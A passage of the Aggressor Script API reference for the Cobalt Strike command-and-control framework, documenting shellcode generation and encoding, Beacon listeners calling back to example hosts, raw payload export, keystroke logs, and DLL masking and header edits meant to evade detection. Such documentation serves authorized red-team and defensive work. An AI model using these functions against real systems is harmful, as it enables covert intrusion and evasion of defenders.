A position-independent blob that decodes the original string and passes execution to it.

Example

# generate shellcode for a listener (listener name, staged?, architecture)
$stager = shellcode("my listener", false, "x86");

# encode it.
$stager = encode($stager, "xor", "x86");

Back to Top

extract_reflective_loader

Extract the executable code for a reflective loader from a Beacon Object File (BOF).

Arguments

$1 - Beacon Object File data that contains a reflective loader.

Returns

The Reflective Loader binary executable code extracted from the Beacon Object File data.

Example

See BEACON_RDLL_GENERATE hook

# ---------------------------------------------------------------------
# extract loader from BOF.
# ---------------------------------------------------------------------
$loader = extract_reflective_loader($data);

Back to Top

file_browser

Open the File Browser. This function does not have any parameters.

Back to Top

fireAlias

Runs a user-defined alias

Arguments

$1 - the beacon id to run the alias against

$2 - the alias name to run

$3 - the arguments to pass to the alias.

Example

# run the foo alias when a new Beacon comes in
on beacon_initial {
   fireAlias($1, "foo", "bar!");
}

Back to Top

fireEvent

Fire an event.

Arguments

$1 - the event name

... - the event arguments.

Example

on foo {
   println("Argument is: $1");
}

fireEvent("foo", "Hello World!");

Back to Top

format_size

Formats a number into a size (e.g., 1024 => 1kb)

Arguments

$1 - the size to format

Returns

A string representing a human readable data size.

Example

println(format_size(1024));

Back to Top

getAggressorClient

Returns the aggressor.AggressorClient Java object. This can reach anything internal within the current Cobalt Strike client context.

Example

$client = getAggressorClient();

Back to Top

get_postex_kit_callback_id

Returns the id constant for the PostEx kit message type.

See also

&beacon_execute_postex_job

Postex Kit

Back to Top

gunzip

Decompress a string (GZIP).

Arguments

$1 - the GZIP-compressed string to decompress

Returns

The argument processed by the gzip decompressor

Example

println(gunzip(gzip("this is a test")));

See also

&gzip

Back to Top

gzip

GZIP a string.

Arguments

$1 - the string to compress

Returns

The argument processed by the gzip compressor

Example

println(gzip("this is a test"));

See also

&gunzip

Back to Top

highlight

Insert an accent (color highlight) into Cobalt Strike's data model

Arguments

$1 - the data model

$2 - an array of rows to highlight

$3 - the accent type

Notes

  • Data model rows include: applications, beacons, credentials, listeners, services, and targets.
  • Accent options are:
Accent Color
[empty] no highlight
good Green
bad Red
neutral Yellow
ignore Grey
cancel Dark Blue

Example

command admincreds {
   local('@creds');
   
   # find all of our creds that are user Administrator.
   foreach $entry (credentials()) {
      if ($entry['user'] eq "Administrator") {
         push(@creds, $entry);
      }
   }
   
   # highlight all of them green!
   highlight("credentials", @creds, "good");
}

Back to Top

host_delete

Delete a host from the targets model

Arguments

$1 - the IPv4 or IPv6 address of this target [you may specify an array of hosts too]

Example

# clear all hosts
host_delete(hosts());

Back to Top

host_info

Get information about a target.

Arguments

$1 - the host IPv4 or IPv6 address

$2 - [Optional] the key to extract a value for

Returns

%info = host_info("address");

Returns a dictionary with known information about this target.

$value = host_info("address", "key");

Returns the value for the specified key from this target's entry in the data model.

Example

# create a script console alias to dump host info
command host {
   println("Host $1");
   foreach $key => $value (host_info($1)) {
      println("$[15]key $value");
   }
}

Back to Top

host_update

Add or update a host in the targets model

Arguments

$1 - the IPv4 or IPv6 address of this target [you may specify an array of hosts too]

$2 - the DNS name of this target

$3 - the target's operating system

$4 - the operating system version number (e.g., 10.0)

$5 - a note for the target.

Note

You may specify a $null value for any argument and, if the host exists, no change will be made to that value.

Example

host_update("192.168.20.3", "DC", "Windows", 10.0);

Back to Top

hosts

Returns a list of IP addresses from Cobalt Strike's target model

Returns

An array of IP addresses

Example

printAll(hosts());

Back to Top

insert_component

Add a javax.swing.JComponent object to the menu tree

Arguments

$1 - the component to add

Back to Top

insert_menu

Bring menus associated with a popup hook into the current menu tree.

Arguments

$1 - the popup hook

... - additional arguments are passed to the child popup hook.

Example

popup beacon {
   # menu definitions above this point
   
   insert_menu("beacon_bottom", $1);
   
   # menu definitions below this point
}

Back to Top

iprange

Generate an array of IPv4 addresses based on a string description

Arguments

$1 - a string with a description of IPv4 ranges

Range Result
192.168.1.2 The IP4 address 192.168.1.2
192.168.1.1, 192.168.1.2 The IPv4 addresses 192.168.1.1 and 192.168.1.2
192.168.1.0/24 The IPv4 addresses 192.168.1.0 through 192.168.1.255
192.168.1.18-192.168.1.30 The IPv4 addresses 192.168.1.18 through 192.168.1.29
192.168.1.18-30 The IPv4 addresses 192.168.1.18 through 192.168.1.29

Returns

An array of IPv4 addresses within the specified ranges.

Example

printAll(iprange("192.168.1.0/25"));
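
The range grammar in the table above is small but has one trap: a dashed range stops one short of its end address, while a CIDR block is expanded in full. The following Python is an added example, not code from Cobalt Strike or its documentation; it re-implements the table literally so the expansion of a description can be checked outside the client. expand_iprange is this example's own name and does not call the Aggressor API.

```python
"""Expand the iprange() string grammar into IPv4 addresses.

Added example, not Cobalt Strike code: it follows the table on the page literally,
so a dashed range stops before its end address while a CIDR block is expanded in full.
"""
import ipaddress
from typing import List


def expand_iprange(spec: str) -> List[str]:
    """Expand a comma-separated description of IPv4 ranges into a list of address strings.

    a.b.c.d          the single address
    a.b.c.d/NN       every address in the block, network and broadcast included
    a.b.c.d-w.x.y.z  a.b.c.d up to but not including w.x.y.z
    a.b.c.d-N        a.b.c.d up to but not including a.b.c.N
    """
    addresses: List[str] = []
    for item in spec.split(","):
        item = item.strip()
        if not item:
            continue
        if "/" in item:
            network = ipaddress.IPv4Network(item, strict=False)
            addresses.extend(str(a) for a in network)
        elif "-" in item:
            start_text, end_text = (part.strip() for part in item.split("-", 1))
            start = ipaddress.IPv4Address(start_text)
            if "." not in end_text:
                # short form: the end is a replacement for the start address's last octet
                end_text = start_text.rsplit(".", 1)[0] + "." + end_text
            end = ipaddress.IPv4Address(end_text)
            if end <= start:
                raise ValueError(f"empty or reversed range: {item!r}")
            addresses.extend(str(ipaddress.IPv4Address(n)) for n in range(int(start), int(end)))
        else:
            addresses.append(str(ipaddress.IPv4Address(item)))   # raises ValueError on junk input
    return addresses


if __name__ == "__main__":
    for spec in ("192.168.1.0/25", "192.168.1.18-30", "10.0.0.1, 10.0.0.2"):
        hosts = expand_iprange(spec)
        print(f"{spec!r}: {len(hosts)} addresses, {hosts[0]} .. {hosts[-1]}")
```

Feeding the expanded list to host_update or openPortScanner instead of the raw string makes the exclusive-end behaviour visible before a scan is launched against the wrong host.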

Back to Top

keystrokes

Returns a list of keystrokes from Cobalt Strike's data model.

Returns

An array of dictionary objects with information about recorded keystrokes.

Example

printAll(keystrokes());

Back to Top

licenseKey

DEPRECATED This function is deprecated in Cobalt Strike 4.6. The function will now return an empty string.

Get the license key for this instance of Cobalt Strike

Returns

Your license key.

Example

println("Your key is: " . licenseKey());

Back to Top

listener_create

DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &listener_create_ext

Create a new listener.

Arguments

$1 - the listener name

$2 - the payload (e.g., windows/beacon_http/reverse_http)

$3 - the listener host

$4 - the listener port

$5 - a comma separated list of addresses for listener to beacon to

Example

# create a foreign listener
listener_create("My Metasploit", "windows/foreign_https/reverse_https", 
      "ads.losenolove.com", 443);

# create an HTTP Beacon listener
listener_create("Beacon HTTP", "windows/beacon_http/reverse_http",
      "www.losenolove.com", 80, 
      "www.losenolove.com, www2.losenolove.com");

Back to Top

listener_create_ext

Create a new listener.

Arguments

$1 - the listener name

$2 - the payload (e.g., windows/beacon_http/reverse_http)

$3 - a map with key/value pairs that specify options for the listener

Note

The following payload options are valid for $2:

Payload Type
windows/beacon_dns/reverse_dns_txt Beacon DNS
windows/beacon_http/reverse_http Beacon HTTP
windows/beacon_https/reverse_https Beacon HTTPS
windows/beacon_bind_pipe Beacon SMB
windows/beacon_bind_tcp Beacon TCP
windows/beacon_extc2 External C2
windows/foreign/reverse_http Foreign HTTP
windows/foreign/reverse_https Foreign HTTPS

The following keys are valid for $3:

Key      | DNS           | HTTP/S           | SMB       | TCP (Bind)
althost  |               | HTTP Host Header |           |
bindto   | bind port     | bind port        |           |
beacons  | c2 hosts      | c2 hosts         |           | bind host
host     | staging host  | staging host     |           |
maxretry | maxretry      | maxretry         |           |
port     | c2 port       | c2 port          | pipe name | port
profile  |               | profile variant  |           |
proxy    |               | proxy config     |           |
strategy | host rotation | host rotation    |           |

The following host rotation Values are valid for the 'strategy' Key:

Option
round-robin
random
failover
failover-5x
failover-50x
failover-100x
failover-1m
failover-5m
failover-15m
failover-30m
failover-1h
failover-3h
failover-6h
failover-12h
failover-1d
rotate-1m
rotate-5m
rotate-15m
rotate-30m
rotate-1h
rotate-3h
rotate-6h
rotate-12h
rotate-1d

Note

The maxretry value uses the syntax exit-[max_attempts]-[increase_attempts]-[duration][m|h|d]. For example, 'exit-10-5-5m' exits the Beacon after 10 consecutive failed connection attempts and, after 5 failed attempts, raises the sleep time to 5 minutes. The sleep time is not changed if the current sleep time is already greater than the specified duration. Jitter still applies to the raised sleep time. A successful connection resets the failed-attempt count to zero and restores the previous sleep time.

The proxy configuration string is the same string you would input into Cobalt Strike's listener dialog. *direct* ignores the local proxy configuration and attempts a direct connection. protocol://user:password@host:port specifies which proxy configuration the artifact should use. The username and password are optional (e.g., protocol://host:port is fine). The acceptable protocols are socks and http. Set the proxy configuration string to $null or "" to use the default behavior.

Example

# create a foreign listener
listener_create_ext("My Metasploit", "windows/foreign/reverse_https",
      %(host => "ads.losenolove.com", port => 443));

# create an HTTP Beacon listener
listener_create_ext("Beacon HTTP", "windows/beacon_http/reverse_http",
      %(host => "www.losenolove.com", port => 80, 
      beacons => "www.losenolove.com, www2.losenolove.com"));

# create an HTTP Beacon listener
listener_create_ext("HTTP", "windows/beacon_http/reverse_http",
      %(host => "stage.host",
      profile => "default",
      port => 80,
      beacons => "b1.host,b2.host",
      althost => "alt.host",
      bindto => 8080,
      strategy => "failover-5x",
      maxretry => "exit-10-5-5m",
      proxy => "proxy.host"));

Back to Top

listener_delete

Stop and remove a listener.

Arguments

$1 - the listener name

Example

listener_delete("Beacon HTTP");

Back to Top

listener_describe

Describe a listener.

Arguments

$1 - the listener name

$2 - (optional) the remote target the listener is destined for

Returns

A string describing the listener

Example

foreach $name (listeners()) {
   println("$name is: " . listener_describe($name));
}

Back to Top

listener_info

Get information about a listener.

Arguments

$1 - the listener name

$2 - (optional) the key to extract a value for

Returns

%info = listener_info("listener name");

Returns a dictionary with the metadata for this listener.

$value = listener_info("listener name", "key");

Returns the value for the specified key from this listener's metadata

Example

# create a script console alias to dump listener info
command dump {
   println("Listener $1");
   foreach $key => $value (listener_info($1)) {
      println("$[15]key $value");
   }
}

Back to Top

listener_pivot_create

Create a new pivot listener.

Arguments

$1 - the Beacon ID

$2 - the listener name

$3 - the payload (e.g., windows/beacon_reverse_tcp)

$4 - the listener host

$5 - the listener port

Note

The only valid payload argument is windows/beacon_reverse_tcp.

Example

# create a pivot listener: 
# $1 = beaconID, $2 = name, $3 = port
alias plisten {
   local('$lhost $bid $name $port');
   
   # extract our arguments
   ($bid, $name, $port) = @_;
   
   # get the name of our target
   $lhost = beacon_info($1, "computer");
   
   btask($1, "create TCP listener on $lhost $+ : $+ $port");
   listener_pivot_create($1, $name, "windows/beacon_reverse_tcp", $lhost, $port);
}

Back to Top

listener_restart

Restart a listener

Arguments

$1 - the listener name

Example

listener_restart("Beacon HTTP");

Back to Top

listeners

Return a list of listener names (with stagers only!) across all team servers this client is connected to.

Returns

An array of listener names.

Example

printAll(listeners());

Back to Top

listeners_local

Return a list of listener names. This function limits itself to the current team server only. External C2 listener names are omitted.

Returns

An array of listener names.

Example

printAll(listeners_local());

Back to Top

listeners_stageless

Return a list of listener names across all team servers this client is connected to. External C2 listeners are filtered (as they're not actionable via staging or exporting as a Reflective DLL).

Returns

An array of listener names.

Example

printAll(listeners_stageless());

Back to Top

localip

Get the IP address associated with the team server.

Returns

A string with the team server's IP address.

Example

println("I am: " . localip());

Back to Top

menubar

Add a top-level item to the menubar.

Arguments

$1 - the description

$2 - the popup hook

Example

popup mythings {
   item "Keep out" {
   }
}

menubar("My &Things", "mythings");

Back to Top

mynick

Get the nickname associated with the current Cobalt Strike client.

Returns

A string with your nickname.

Example

println("I am: " . mynick());

Back to Top

nextTab

Activate the tab that is to the right of the current tab.

Example

bind Ctrl+Right {
   nextTab();
}

Back to Top

on

Register an event handler. This is an alternative to the on keyword.

Arguments

$1 - the name of the event to respond to

$2 - a callback function. Called when the event happens.

Example

sub foo {
   blog($1, "Foo!");
}

on("beacon_initial", &foo);

Back to Top

openAboutDialog

Open the "About Cobalt Strike" dialog

Example

openAboutDialog();

Back to Top

openApplicationManager

Open the application manager (system profiler results) tab.

Example

openApplicationManager();

Back to Top

openAutoRunDialog

Open the auto run dialog.

Example

openAutoRunDialog();

Back to Top

openBeaconBrowser

Open the beacon browser tab.

Example

openBeaconBrowser();

Back to Top

openBeaconConsole

Open the console to interact with a Beacon

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "Interact" {
   local('$bid');
   foreach $bid ($1) {
      openBeaconConsole($bid);
   }
}

Back to Top

openBrowserPivotSetup

Open the browser pivot setup dialog

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "Browser Pivoting" {
   local('$bid');
   foreach $bid ($1) {
      openBrowserPivotSetup($bid);
   }
}

Back to Top

openBypassUACDialog

REMOVED Removed in Cobalt Strike 4.1.

Back to Top

openCloneSiteDialog

Open the dialog for the website clone tool.

Example

openCloneSiteDialog();

Back to Top

openConnectDialog

Open the connect dialog.

Example

openConnectDialog();

Back to Top

openCovertVPNSetup

Open the Covert VPN setup dialog

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "VPN Pivoting" {
   local('$bid');
   foreach $bid ($1) {
      openCovertVPNSetup($bid);
   }
}

Back to Top

openCredentialManager

Open the credential manager tab.

Example

openCredentialManager();

Back to Top

openDefaultShortcutsDialog

Open the Default Keyboard Shortcuts dialog. This function does not have any parameters.

Back to Top

openDownloadBrowser

Open the download browser tab

Example

openDownloadBrowser();

Back to Top

openElevateDialog

Open the dialog to launch a privilege escalation exploit.

Arguments

$1 - the beacon ID

Example

item "Elevate" {
   local('$bid');
   foreach $bid ($1) {
      openElevateDialog($bid);
   }
}

Back to Top

openEventLog

Open the event log.

Example

# Example using the dispatch_event aggressor script function
on ready {
   # Dock the event log tab at the bottom of the Cobalt Strike window
   dispatch_event({
      $client = getAggressorClient();
      $tabMgr = [$client getTabManager];
      $console = openEventLog();
      [$tabMgr dockAppTab: $console];
   });
}

Back to Top

openFileBrowser

Open the file browser for a Beacon

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "Browse Files" {
   local('$bid');
   foreach $bid ($1) {
      openFileBrowser($bid);
   }
}

Back to Top

openGoldenTicketDialog

Open a dialog to help generate a golden ticket

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "Golden Ticket" {
   local('$bid');
   foreach $bid ($1) {
      openGoldenTicketDialog($bid);
   }
}

Back to Top

openHTMLApplicationDialog

Open the HTML Application Dialog.

Example

openHTMLApplicationDialog();

Back to Top

openHostFileDialog

Open the host file dialog.

Example

openHostFileDialog();

Back to Top

openInterfaceManager

Open the tab to manage Covert VPN interfaces

Example

openInterfaceManager();

Back to Top

openJavaSignedAppletDialog

Open the Java Signed Applet dialog

Example

openJavaSignedAppletDialog();

Back to Top

openJavaSmartAppletDialog

Open the Java Smart Applet dialog

Example

openJavaSmartAppletDialog();

Back to Top

openJobBrowser

Open the job browser tab.

Arguments

$1 - the array of bids.

Example

openJobBrowser(@($bid))          # open job browser for one Beacon
openJobBrowser(@($bid1, $bid2))  # open job browser for multiple Beacons
openJobBrowser()                 # open job browser for all Beacons

Back to Top

openJobConsole

Open the console to the job output.

Arguments

$1 - the Beacon id.

$2 - the Job id.

Back to Top

openJumpDialog

Open Cobalt Strike's lateral movement dialog

Arguments

$1 - the type of lateral movement. See &beacon_remote_exploits for a list of options. ssh and ssh-key are options too.

$2 - an array of targets to apply this action against

Example

openJumpDialog("psexec_psh", @("192.168.1.3", "192.168.1.4"));

Back to Top

openKeystrokeBrowser

Open the keystroke browser tab

Example

openKeystrokeBrowser();

Back to Top

openListenerManager

Open the listener manager

Example

openListenerManager();

Back to Top

openMakeTokenDialog

Open a dialog to help generate an access token.

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "Make Token" {
   local('$bid');
   foreach $bid ($1) {
      openMakeTokenDialog($bid);
   }
}

Back to Top

openMalleableProfileDialog

Open the malleable C2 profile dialog.

Example

openMalleableProfileDialog();

Back to Top

openOfficeMacroDialog

Open the office macro export dialog

Example

openOfficeMacroDialog();

Back to Top

openOneLinerDialog

Open the dialog to generate a PowerShell one-liner for this specific Beacon session.

Arguments

$1 - the beacon ID

Example

item "&One-liner" {
   openOneLinerDialog($1);
}

Back to Top

openOrActivate

If a Beacon console exists, make it active. If a Beacon console does not exist, open it.

Arguments

$1 - the Beacon ID

Example

item "&Activate" {
   local('$bid');
   foreach $bid ($1) {
      openOrActivate($bid);
   }
}

Back to Top

openPayloadGeneratorDialog

Open the Payload Generator dialog.

Example

openPayloadGeneratorDialog();

Back to Top

openPayloadGeneratorStageDialog

Open the Payload Generator Stageless dialog.

Example

openPayloadGeneratorStageDialog();

Back to Top

openPayloadHelper

Open a payload chooser dialog.

Arguments

$1 - a callback function. Arguments: $1 - the selected listener.

Example

openPayloadHelper(lambda({
   bspawn($bid, $1);
}, $bid => $1));

Back to Top

openPivotListenerSetup

Open the pivot listener setup dialog

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "Listener..." {
   local('$bid');
   foreach $bid ($1) {
      openPivotListenerSetup($bid);
   }
}

Back to Top

openPortScanner

Open the port scanner dialog

Arguments

$1 - an array of targets to scan

Example

openPortScanner(@("192.168.1.3"));

Back to Top

openPortScannerLocal

Open the port scanner dialog with options to target a Beacon's local network

Arguments

$1 - the beacon to target with this feature

Example

item "Scan" {
   local('$bid');
   foreach $bid ($1) {
      openPortScannerLocal($bid);
   }
}

Back to Top

openPowerShellWebDialog

Open the dialog to setup the PowerShell Web Delivery Attack

Example

openPowerShellWebDialog();

Back to Top

openPreferencesDialog

Open the preferences dialog

Example

openPreferencesDialog();

Back to Top

openProcessBrowser

Open a process browser for one or more Beacons

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

item "Processes" {
   openProcessBrowser($1);
}

Back to Top

openSOCKSBrowser

Open the tab to list SOCKS proxy servers

Example

openSOCKSBrowser();

Back to Top

openSOCKSSetup

Open the SOCKS proxy server setup dialog

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "SOCKS Server" {
   local('$bid');
   foreach $bid ($1) {
      openSOCKSSetup($bid);
   }
}

Back to Top

openScreenshotBrowser

Open the screenshot browser tab

Example

openScreenshotBrowser();

Back to Top

openScriptConsole

Open the Aggressor Script console.

Example

# Example using the dispatch_event aggressor script function
on ready {
   # Send the script console tab to the bottom of the cobalt strike window
   dispatch_event({
      $client = getAggressorClient();
      $tabMgr = [$client getTabManager];
      $console = openScriptConsole();
      [$tabMgr dockAppTab: $console];
   });
}

Back to Top

openScriptManager

Open the tab for the script manager.

Example

openScriptManager();

Back to Top

openScriptedWebDialog

Open the dialog to setup a Scripted Web Delivery Attack

Example

openScriptedWebDialog();

Back to Top

openServiceBrowser

Open service browser tab.

Arguments

$1 - an array of targets to show services for

Example

openServiceBrowser(@("192.168.1.3"));

Back to Top

openSiteManager

Open the site manager.

Example

openSiteManager();

Back to Top

openSpawnAsDialog

Open dialog to spawn a payload as another user

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "Spawn As..." {
   local('$bid');
   foreach $bid ($1) {
      openSpawnAsDialog($bid);
   }
}

Back to Top

openSpawnDialog

Open dialog to spawn a payload.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

item "&Spawn" {
   openSpawnDialog($1);
}

Back to Top

openSpearPhishDialog

Open the dialog for the spear phishing tool.

Example

openSpearPhishDialog();

Back to Top

openSystemInformationDialog

Open the system information dialog.

Example

openSystemInformationDialog();

Back to Top

openSystemProfilerDialog

Open the dialog to setup the system profiler.

Example

openSystemProfilerDialog();

Back to Top

openTargetBrowser

Open the targets browser

Example

openTargetBrowser();

Back to Top

openWebLog

Open the web log tab.

Example

# Example using the dispatch_event aggressor script function
on ready {
   # Dock the web log tab at the bottom of the Cobalt Strike window
   dispatch_event({
      $client = getAggressorClient();
      $tabMgr = [$client getTabManager];
      $console = openWebLog();
      [$tabMgr dockAppTab: $console];
   });
}

Back to Top

openWindowsDropperDialog

REMOVED Removed in Cobalt Strike 4.0.

Back to Top

openWindowsExecutableDialog

Open the dialog to generate a Windows executable.

Example

openWindowsExecutableDialog();

Back to Top

openWindowsExecutableStageDialog

Open the dialog to generate a stageless Windows executable.

Example

openWindowsExecutableStageDialog();

Back to Top

openWindowsExecutableStageAllDialog

Open the dialog to generate all of the stageless payloads (in x86 and x64) for all of the configured listeners. This dialog can also be found in the UI menu under Payloads -> Windows Stageless Generate all Payloads.

Example

openWindowsExecutableStageAllDialog();

Back to Top

payload

Exports a raw payload for a specific Cobalt Strike listener.

Arguments

$1 - the listener name

$2 - x86|x64 the architecture of the payload

$3 - exit method: 'thread' (leave the thread when done) or 'process' (exit the process when done). Use 'thread' if injecting into an existing process.

$4 - A string value for the system call method. Valid values are:

None: Use the standard Windows API function.

Direct: Use the Nt* version of the function.

Indirect: Jump to the appropriate instruction within the Nt* version of the function.

$5 - (optional) The supporting HTTP library for generated beacons (wininet|winhttp|$null|blank string).

Returns

A scalar containing position-independent code for the specified listener.

Example

$data = payload("my listener", "x86", "process", "Direct");

$handle = openf(">out.bin");
writeb($handle, $data);
closef($handle);

Back to Top

payload_bootstrap_hint

Get the offset of a function pointer hint used by Beacon's Reflective Loader. Populate these hints with the requested function addresses to have Beacon load itself into memory in a more OPSEC-safe way.

Arguments

$1 - the payload position-independent code (specifically, Beacon)

$2 - the function to get the patch location for

Notes

  • Cobalt Strike's Beacon has a protocol to accept artifact-provided function pointers for functions required by Beacon's Reflective Loader. The protocol is to patch the addresses of GetProcAddress and GetModuleHandleA into the Beacon DLL. Use of this protocol allows Beacon to load itself in memory without triggering shellcode detection heuristics that monitor reads of kernel32's Export Address Table. This protocol is optional. Artifacts that don't follow this protocol fall back to resolving key functions via the Export Address Table.
  • The Artifact Kit and Resource Kit both implement this protocol. Download these kits to see how to use this function.

Returns

The offset to a memory location to patch with a pointer for a specific function used by Beacon's Reflective Loader.

Back to Top

payload_local

Exports a raw payload for a specific Cobalt Strike listener. Use this function when you plan to spawn this payload from another Beacon session. Cobalt Strike will generate a payload that embeds key function pointers, needed to bootstrap the agent, taken from the parent session's metadata.

Arguments

$1 - the parent Beacon session ID

$2 - the listener name

$3 - x86|x64 the architecture of the payload

$4 - exit method: 'thread' (leave the thread when done) or 'process' (exit the process when done). Use 'thread' if injecting into an existing process.

$5 - A string value for the system call method. Valid values are:

None: Use the standard Windows API function.

Direct: Use the Nt* version of the function.

Indirect: Jump to the appropriate instruction within the Nt* version of the function.

$6 - (optional) The supporting HTTP library for generated beacons (wininet|winhttp|$null|blank string).

Returns

A scalar containing position-independent code for the specified listener.

Example

$data = payload_local($bid, "my listener", "x86", "process", "None");

$handle = openf(">out.bin");
writeb($handle, $data);
closef($handle);

Back to Top

pe_insert_rich_header

Insert rich header data into Beacon DLL Content. If there is existing rich header information, it will be replaced.

Arguments

$1 - Beacon DLL content

$2 - Rich header

Returns

Updated DLL Content

Note

The rich header length should be on a 4 byte boundary for subsequent checksum calculations.

Example

# -------------------------------------
# Insert (replace) rich header
# -------------------------------------
$rich_header = "<your rich header info>";
$temp_dll = pe_insert_rich_header($temp_dll, $rich_header);

Back to Top

pe_mask

Mask data in the Beacon DLL Content based on position and length.

Arguments

$1 - Beacon DLL content

$2 - Start location

$3 - Length to mask

$4 - Byte value mask key (int)

Returns

Updated DLL Content

Example

# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_mask {

   local('$temp_dll, $start, $length, $maskkey');
   local('%pemap');
   local('@loc_en, @val_en');

   $temp_dll = $1;

   # -------------------------------------
   # Inspect the current DLL...
   # -------------------------------------
   %pemap = pedump($temp_dll);
   @loc_en = values(%pemap, @("Export.Name.<location>"));
   @val_en = values(%pemap, @("Export.Name.<value>"));

   if (size(@val_en) != 1) {
      warn("Unexpected size of export name value array: " . size(@val_en));
   } else {
      warn("Current export value: " . @val_en[0]);
   }

   if (size(@loc_en) != 1) {
      warn("Unexpected size of export location array: " . size(@loc_en));
   } else {
      warn("Current export name location: " . @loc_en[0]);
   }

   # -------------------------------------
   # Set parameters (parse number as base 10)
   # -------------------------------------
   $start = parseNumber(@loc_en[0], 10);
   $length = 4;
   $maskkey = 22;

   # -------------------------------------
   # mask some data in a dll
   # -------------------------------------
   # warn("pe_mask(dll, " . $start . ", " . $length . ", " . $maskkey . ")");
   $temp_dll = pe_mask($temp_dll, $start, $length, $maskkey);

   # dump_my_pe($temp_dll);

   # -------------------------------------
   # un-mask (running the same mask a second time should "un-mask")
   # (This would normally be done by the reflective loader)
   # -------------------------------------
   # warn("pe_mask(dll, " . $start . ", " . $length . ", " . $maskkey . ")");
   # $temp_dll = pe_mask($temp_dll, $start, $length, $maskkey);

   # dump_my_pe($temp_dll);

   # -------------------------------------
   # All Done!  Give back edited DLL!
   # -------------------------------------
   return $temp_dll;
}

Back to Top

pe_mask_section

Mask the data of a named section in the Beacon DLL Content.

Arguments

$1 - Beacon DLL content

$2 - Section name

$3 - Byte value mask key (int)

Returns

Updated DLL Content

Example

# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_mask_section {

   local('$temp_dll, $section_name, $maskkey');
   local('@loc_en, @val_en');

   $temp_dll = $1;

   # -------------------------------------
   # Set parameters
   # -------------------------------------
   $section_name = ".text";
   $maskkey = 23;

   # -------------------------------------
   # mask a section in a dll
   # -------------------------------------
   # warn("pe_mask_section(dll, " . $section_name . ", " . $maskkey . ")");
   $temp_dll = pe_mask_section($temp_dll, $section_name, $maskkey);

   # dump_my_pe($temp_dll);

   # -------------------------------------
   # un-mask (running the same mask a second time should "un-mask")
   # (This would normally be done by the reflective loader)
   # -------------------------------------
   # warn("pe_mask_section(dll, " . $section_name . ", " . $maskkey . ")");
   # $temp_dll = pe_mask_section($temp_dll, $section_name, $maskkey);

   # dump_my_pe($temp_dll);

   # -------------------------------------
   # All Done!  Give back edited DLL!
   # -------------------------------------
   return $temp_dll;
}

Back to Top

pe_mask_string

Mask a string in the Beacon DLL Content based on position.

Arguments

$1 - Beacon DLL content

$2 - Start location

$3 - Byte value mask key (int)

Returns

Updated DLL Content

Example

# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_mask_string {

   local('$temp_dll, $location, $length, $maskkey');
   local('%pemap');
   local('@loc');

   $temp_dll = $1;

   # -------------------------------------
   # Inspect the current DLL...
   # -------------------------------------
   %pemap = pedump($temp_dll);
   @loc = values(%pemap, @("Sections.AddressOfName.0."));

   if (size(@loc) != 1) {
      warn("Unexpected size of section name location array: " . size(@loc));
   } else {
      warn("Current section name location: " . @loc[0]);
   }

   # -------------------------------------
   # Set parameters
   # -------------------------------------
   $location = @loc[0];
   $length = 5;
   $maskkey = 23;

   # -------------------------------------
   # pe_mask_string (mask a string in a dll)
   # -------------------------------------
   # warn("pe_mask_string(dll, " . $location . ", " . $maskkey . ")");
   $temp_dll = pe_mask_string($temp_dll, $location, $maskkey);

   # dump_my_pe($temp_dll);

   # -------------------------------------
   # un-mask (running the same mask a second time should "un-mask")
   # we are unmasking the length of the string and the null character
   # (This would normally be done by the reflective loader)
   # -------------------------------------
   # warn("pe_mask(dll, " . $location . ", " . $length . ", " . $maskkey . ")");
   # $temp_dll = pe_mask($temp_dll, $location, $length, $maskkey);

   # dump_my_pe($temp_dll);

   # -------------------------------------
   # All Done!  Give back edited DLL!
   # -------------------------------------
   return $temp_dll;
}

Back to Top

pe_patch_code

Patch code in the Beacon DLL Content by finding a byte sequence in the '.text' section and replacing it.

Arguments

$1 - Beacon DLL content

$2 - byte array to search for in the '.text' section; its offset is the patch location

$3 - byte array written at the resolved offset (overwrites the existing data)

Returns

Updated DLL Content

Example

# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_patch_code {

   local('$temp_dll, $findme, $replacement');

   $temp_dll = $1;

   # ====== simple text values ======
   $findme = "abcABC123";
   $replacement = "123ABCabc";

   # warn("pe_patch_code(dll, " . $findme . ", " . $replacement . ")");
   $temp_dll = pe_patch_code($temp_dll, $findme, $replacement);

   # ====== byte array given as escaped byte values ======
   $findme = "\x01\x02\x03\xfc\xfe\xff";
   $replacement = "\x01\x02\x03\xfc\xfe\xff";

   # warn("pe_patch_code(dll, " . $findme . ", " . $replacement . ")");
   $temp_dll = pe_patch_code($temp_dll, $findme, $replacement);

   # dump_my_pe($temp_dll);

   # -------------------------------------
   # All Done!  Give back edited DLL!
   # -------------------------------------
   return $temp_dll;
}

Back to Top

pe_remove_rich_header

Remove the rich header from Beacon DLL Content.

Arguments

$1 - Beacon DLL content

Returns

Updated DLL Content

Example

# -------------------------------------
# Remove/Replace Rich Header
# -------------------------------------
$temp_dll = pe_remove_rich_header($temp_dll);

Back to Top

pe_set_compile_time_with_long

Set the compile time in the Beacon DLL Content.

Arguments

$1 - Beacon DLL content

$2 - Compile Time (as a long in milliseconds)

Returns

Updated DLL Content

Example

# date is in milliseconds ("1893521594000" = "01 Jan 2030 12:13:14")
$date = 1893521594000;
$temp_dll = pe_set_compile_time_with_long($temp_dll, $date);

# date is in milliseconds ("1700000001000" = "14 Nov 2023 16:13:21")
$date = 1700000001000;
$temp_dll = pe_set_compile_time_with_long($temp_dll, $date);

Back to Top

pe_set_compile_time_with_string

Set the compile time in the Beacon DLL Content.

Arguments

$1 - Beacon DLL content

$2 - Compile Time (as a string)

Returns

Updated DLL Content

Example

# ("01 Jan 2020 15:16:17" = "1577913377000")
$strTime = "01 Jan 2020 15:16:17";
